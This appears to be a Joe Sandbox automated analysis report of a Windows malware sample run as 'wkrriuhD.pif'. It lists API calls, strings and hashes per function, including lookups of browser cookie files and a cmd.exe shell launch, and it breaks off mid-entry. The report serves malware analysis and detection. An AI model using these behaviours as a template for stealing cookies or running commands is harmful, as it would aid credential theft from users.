• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: Alloc$QueryValueVersionVirtual
• String ID:
• API String ID: 4111955057-0
• Opcode ID: 4e753a6cc7b253fcce6ea3a1439e0590325210fbb9c4bc7a8b22a5e8403a9220
• Instruction ID: 64d802b366df9ffe340a536ca48f64c90ae43d30425c1319df72fdf1fd3218fb
• Opcode Fuzzy Hash: 4e753a6cc7b253fcce6ea3a1439e0590325210fbb9c4bc7a8b22a5e8403a9220
• Instruction Fuzzy Hash: 81F012B14443019AD710EFB1DDC1A9B7398EB88314F00893EB65897281D7BD95499F9E
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: __aulldiv
• String ID: <fF$hdF$NG
• API String ID: 3732870572-2168386591
• Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
• Instruction ID: d09029c639586a2fd51c7bdda09592acdf342c3f66ffc8253cd495912437a790
• Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
• Instruction Fuzzy Hash: 31B18131508341AFDB14FB68C896AAFBBE9BFC4310F50491DF48A92292EF359D058B57
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: __dosmaperr
• String ID: H
• API String ID: 2332233096-2852464175
• Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
• Instruction ID: 7440b241a6174685bf1e40b335afa1c4e34eeb5fd5c5a2d40484f5bb7d553e18
• Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
• Instruction Fuzzy Hash: 60A14432A101859FCF1CAF68DC567AE7FA0FB463A0F24025AE851EB392DB318C52C755
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: __freea
• String ID: PkGNG
• API String ID: 240046367-263838557
• Opcode ID: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
• Instruction ID: c31558e7e6e74745f6a05ccf506406549cc0ad77bc00776177ee133ba80a4e64
• Opcode Fuzzy Hash: 118846f8b98fa7142c6fc34e08ba9c255994cc722e781db25b6080b075eb9fff
• Instruction Fuzzy Hash: AB518072610217EBEB358F68CC45EAA7FAAFB84750F16462BFC04E7250EB74DC808650
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(80000000,?,?), ref: 00401424
• RegQueryValueA.ADVAPI32(?,?,?,00000100), ref: 00401449
• RegCloseKey.ADVAPI32(?,?,?,?,00000100,80000000,?,?), ref: 00401470
Strings
Memory Dump Source
• Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Sun
• API String ID: 3677997916-1777960983
• Opcode ID: e40e27801e12837888f6718cf7172a39cad2c9d398c183f299d24010d73cb072
• Instruction ID: c5084538d5e008a304e2dd35038a48b73e5a144ba9705b53fd972559b966f926
• Opcode Fuzzy Hash: e40e27801e12837888f6718cf7172a39cad2c9d398c183f299d24010d73cb072
• Instruction Fuzzy Hash: 945172F2C106056BD610EAB1DC82EE7736CAF94304F044D3EBA5AA1182FB79670896F5
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free_strpbrk
• String ID: *?$.
• API String ID: 3300345361-3972193922
• Opcode ID: 91845898048f44b95c99453f11eaab977acc7f23da76a048fa7291357599bc12
• Instruction ID: dca0615ddbb384378e7faab843902bde2c60bd0346dc8977366605fc0da7cc88
• Opcode Fuzzy Hash: 91845898048f44b95c99453f11eaab977acc7f23da76a048fa7291357599bc12
• Instruction Fuzzy Hash: 57517E75E0020AAFDF24DFACD885AADBBF5FF98314F24816BE455E7350E6319A018B50
Uniqueness
Uniqueness Score: -1.00%

APIs
• _strpbrk.LIBCMT ref: 1237E738
• _free.LIBCMT ref: 1237E855
  • Part of subcall function 1236BD19: IsProcessorFeaturePresent.KERNEL32(00000017,1236BCEB,1233A71B,?,?,00000000,1233A71B,00000000,?,?,1236BD0B,00000000,00000000,00000000,00000000,00000000), ref: 1236BD1B
  • Part of subcall function 1236BD19: GetCurrentProcess.KERNEL32(C0000417,?,1233A71B), ref: 1236BD3D
  • Part of subcall function 1236BD19: TerminateProcess.KERNEL32(00000000), ref: 1236BD44
Strings
Memory Dump Source
• Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
• Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
• String ID: *?$.
• API String ID: 2812119850-3972193922
• Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
• Instruction ID: b6722b8d2f7cb309bb77622480a799c04c9084dc611834e98a4e79740c0f4cd1
• Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
• Instruction Fuzzy Hash: 26519476E0024AEFDF14CFA8C880AEDBBF9EF48714F254169D554E7340E679AA01CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: _free
• String ID: &i^$&i^
• API String ID: 269201875-2997179078
• Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
• Instruction ID: 67be60aa6303b610ba582c280609700b63851ff00c2861c3163bcdcdff90decd
• Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
• Instruction Fuzzy Hash: 2C415D3190854AABDB386ABE8C4DA6E3EA9FF89330F140667F454C3391F670494193A1
Uniqueness
Uniqueness Score: -1.00%

APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D32C0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005D32D5
Strings
Memory Dump Source
• Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
Yara matches
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: B1]$B1]
• API String ID: 885266447-3465817952
                                                                                                                                                                                          • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                                                                                          • Instruction ID: 3f32623d037a7fdb7520e1cb6cfe600f2c6478437013cd24dc57257d2fbb0e5a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                                                                                                                                          • Instruction Fuzzy Hash: F7515C75E00149ABCB24DF9CC884AADBFB2FB98314F19825BE81897361D7719E51CB41
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\wkrriuhD.pif,00000104), ref: 14644C1D
                                                                                                                                                                                          • _free.LIBCMT ref: 14644CE8
                                                                                                                                                                                          • _free.LIBCMT ref: 14644CF2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                          • String ID: C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                          • API String ID: 2506810119-97380468
                                                                                                                                                                                          • Opcode ID: 01783ab0519835c1b7ad7777f97764c03a1b3736e5922a2c74f9f90586a1fbb3
                                                                                                                                                                                          • Instruction ID: 23c94e76ad30daf6e4c120fcc541fd782d4589c6806dc5e5d6a19f62eeb1eb1f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 01783ab0519835c1b7ad7777f97764c03a1b3736e5922a2c74f9f90586a1fbb3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1231A3B5A01258EFDF22DF99C8C199EBBFCEF9571CF28417AE904A7200D6709A41CB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Libraries\wkrriuhD.pif,00000104), ref: 12373475
                                                                                                                                                                                          • _free.LIBCMT ref: 12373540
                                                                                                                                                                                          • _free.LIBCMT ref: 1237354A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                          • String ID: C:\Users\Public\Libraries\wkrriuhD.pif
                                                                                                                                                                                          • API String ID: 2506810119-97380468
                                                                                                                                                                                          • Opcode ID: 078efde8bfca4d61ea2a5a747fc538c25393828876438215cb2d2ff479641c62
                                                                                                                                                                                          • Instruction ID: 725d1dd8174ef4b613e787a34df763b48fe0536257e62750006d46a75c068c2c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 078efde8bfca4d61ea2a5a747fc538c25393828876438215cb2d2ff479641c62
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE3185B6A04268EFDF25CF99D8C5EAEBBFCEF85314F104166E405D7200DA789A41CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 1233C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 1233C559
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 1233C6EC
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 1233C757
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • User Data\Default\Network\Cookies, xrefs: 1233C6D2
                                                                                                                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 1233C704
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                                          • API String ID: 1174141254-1980882731
                                                                                                                                                                                          • Opcode ID: 4cc4ef6da4b79302f71cebb039d9d04bd1d85a9bdfd7516c45d5dc4cfaf15767
                                                                                                                                                                                          • Instruction ID: 66ca1cab1be412d5e10fce4a82d4ce8b42bf50596eeaa3b1259a052eaeb12612
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cc4ef6da4b79302f71cebb039d9d04bd1d85a9bdfd7516c45d5dc4cfaf15767
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11216377D001199ACB66EBA2DC55CFEBB7CEE50312F000529E542A3190EF24BB4AC790
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,12335159), ref: 12335173
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 123351CA
                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 123351D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                                                                          • String ID: Connection Timeout
                                                                                                                                                                                          • API String ID: 2055531096-499159329
                                                                                                                                                                                          • Opcode ID: ed3ebf07dcb93779e171bbc71baf3d4863c38f5585b32e81333ddbe9ab829eb0
                                                                                                                                                                                          • Instruction ID: 6ac3b5d757012ed137c9f29c646625e56bb23d2bd30137a8a33460e60906fe5b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed3ebf07dcb93779e171bbc71baf3d4863c38f5585b32e81333ddbe9ab829eb0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5801F777951B40AFEB376B36CCC146BBBE9FF453033000A2DD18386BA1DA60A501CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 1233E833
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                                                                                                          • Opcode ID: a44fc1b162c1056fe6c776de6fccc7c4500569bcc29f8391e81fc3998ab4a7a1
                                                                                                                                                                                          • Instruction ID: 415a46f86ba2516cd97a1a2c667e483b75795c673890ab5d3939e4d0e6e3ac6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: a44fc1b162c1056fe6c776de6fccc7c4500569bcc29f8391e81fc3998ab4a7a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 67018177C843087EFB6AEA90CC42FF9776C5F10B07F008519EA15A90C1EA25B742C6B2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 12346130
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExecuteShell
                                                                                                                                                                                          • String ID: /C $cmd.exe$open
                                                                                                                                                                                          • API String ID: 587946157-3896048727
                                                                                                                                                                                          • Opcode ID: 206ab2a9beee32d390eb707afaf7d197c29ae14873606f3aa179365fcf4419c9
                                                                                                                                                                                          • Instruction ID: c7620f620659ef6545e8cbceca87aebec93a5660276e447bfee3a7025055d8bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 206ab2a9beee32d390eb707afaf7d197c29ae14873606f3aa179365fcf4419c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58E030765083446ECA96D764CC90CBF73ADAA54702B400D1CB182D2090EF24AA09CB10
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: !"bogus context in Local_unwind()"$XX.CPP$XX.CPP$bogus context in Local_unwind()$xdrPtr && xdrPtr == *xdrLPP
                                                                                                                                                                                          • API String ID: 0-2274747209
                                                                                                                                                                                          • Opcode ID: dffa354142600f96ffae5fe3d2cd138efea7f7a1046f33163713e7410180cacb
                                                                                                                                                                                          • Instruction ID: 516aefb7a012da5173fd0e028fe258a323a667e0b87e22488f643828e0ac6d51
                                                                                                                                                                                          • Opcode Fuzzy Hash: dffa354142600f96ffae5fe3d2cd138efea7f7a1046f33163713e7410180cacb
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0341B331A00204ABCB10CF95C88196EBBB5FF88311B2485BEE8057B3D5D739AF41CB98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: ec4142ae80350b4b9c069a6394b0971aab0548a2c4ce586fc51d3acaf8058750
                                                                                                                                                                                          • Instruction ID: 3ddc87e28a35077c3c87ccb1237fa6271443e838cdfd0a8e0945515301df3026
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec4142ae80350b4b9c069a6394b0971aab0548a2c4ce586fc51d3acaf8058750
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC14575904206ABDB34EF7D9D49AAB7FA8FF85310F1444ABE48497381E7318E41CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XX.CPP$XX.CPP$XX.CPP$__CPPexceptionList$xdrPtr->xdERRaddr == xl
                                                                                                                                                                                          • API String ID: 0-2716089706
                                                                                                                                                                                          • Opcode ID: 3613f1da5c4df233601c34342cc4047bbf08cb7ddbce1de1525740bd2869398b
                                                                                                                                                                                          • Instruction ID: 205238748063476e7240139f92a0f40b6e412298044ebf34a4ef91ed06f1cea7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3613f1da5c4df233601c34342cc4047bbf08cb7ddbce1de1525740bd2869398b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E216D74D40204ABCB00DF95C886BAEB3B4BF58714F1441BAE8443B3D2D778AE408A99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                          • Opcode ID: 94711b856b3c5e2de80f6088aa64ab24f970b25138e9d1cb8ebc1df5ba721bbe
                                                                                                                                                                                          • Instruction ID: 9b829efd60af5f287b3ca04a903b9376cbb834a8c79bbac30a22192df3baae1b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94711b856b3c5e2de80f6088aa64ab24f970b25138e9d1cb8ebc1df5ba721bbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: C4A12F769002869FEB358F1CC891BABBFA6FF51300F1945ABE4958B382D7388941C752
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                                          • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                                                                                          • Instruction ID: 7c8463cade10796610cdeb8d07b89d5494b4303a7ac5869d4cc0144bffc7b7a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BA16877A143869FEB11CF98C8807EEBBE5EF25314F2442ADD9949B281C23D9943C750
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: !"what?"$(mfnMask & 0x0080) == 0$XX.CPP$XX.CPP$what?
                                                                                                                                                                                          • API String ID: 0-3848249686
                                                                                                                                                                                          • Opcode ID: 5edef0c466f2d7c8f1e4992642c7e8d12e3f46bd7ad321fb427a786fd913252a
                                                                                                                                                                                          • Instruction ID: 6f30e4bb0dc5be0823d8bc3532c4122e76f8a62a5c106d7b0af8ad83967fcba9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5edef0c466f2d7c8f1e4992642c7e8d12e3f46bd7ad321fb427a786fd913252a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7401A2B664420C7BEF001E95ED8D6AAB755FB80324F58C233F91D345E0C7BB4A10A549
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: +$-$-$0$9
                                                                                                                                                                                          • API String ID: 0-893461730
                                                                                                                                                                                          • Opcode ID: 99786426fa04367196df5dcd6138f2c741ad56ee1871359df960091d0e0ec61b
